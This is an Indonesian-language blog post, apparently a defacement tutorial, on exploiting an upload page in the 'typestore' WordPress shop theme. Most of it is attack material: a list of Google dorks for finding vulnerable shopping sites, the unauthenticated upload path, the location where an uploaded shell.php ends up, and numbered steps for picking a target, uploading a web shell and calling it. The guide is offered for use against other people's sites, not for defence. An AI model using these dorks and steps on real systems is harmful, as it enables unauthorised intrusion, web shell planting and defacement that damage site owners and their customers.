Deface Teknik WP-Store -> Config

Cara Deface Dengan Teknik POC : Wp-Store -> Config


Dork :

intext:Shopping Cart You have 0 item in your Shopping Bag Checkout »
inurl:store inurl:=store intext:"You have 0 item in your Shopping Bag" & intext:"Categories"
intext:You have 0 item in your Shopping Bag & intext:Categories
intext:SHOPPING CART IS EMPTY You have no items in your shopping cart. Click here to continue shopping.
inurl:page=login intext:Shopping Cart You have 0 item in your Shopping Bag Checkout »
intext:"Sorry! your cart is empty. Select product(s) to continue."
intext:"Sorry, the Cart is empty. Select Products via Continue Shopping."
intext:"My Shopping Cart (0)"
intext:"Cart is empty. Select Products"
intext:"You have 0($0) item in your Shopping Bag."
intext:Register & Checkout Click below to register and check out. inurl:/page=login
inurl:/page=store

Exploit : localhost/wp-content/themes/typestore/upload
See    :  localhost/wp-content/uploads/products_img/you'r shell.php
Tutorial :

1.) Buka Google
2.) Masukan Dork, Contoh: "ecommerce" inurl:/page=store [Dork Bisa Dikembangin Sendiri]
3.) Pilih Salah Satu Penelusuran

4.) Lalu Pencet CTRL + U
5.) Cari style.css 

6.) lalu klik style.css dan ganti style.css menjadi upload, hingga jadi seperti ini :

pada angka 1 upload file kamu dan jika berhasil akan menjadi seperti ini



untuk memanggil shellnya begini


Biasakan Lah Pantang Bertanya Sebelum Mencoba :)

0 komentar:

Posting Komentar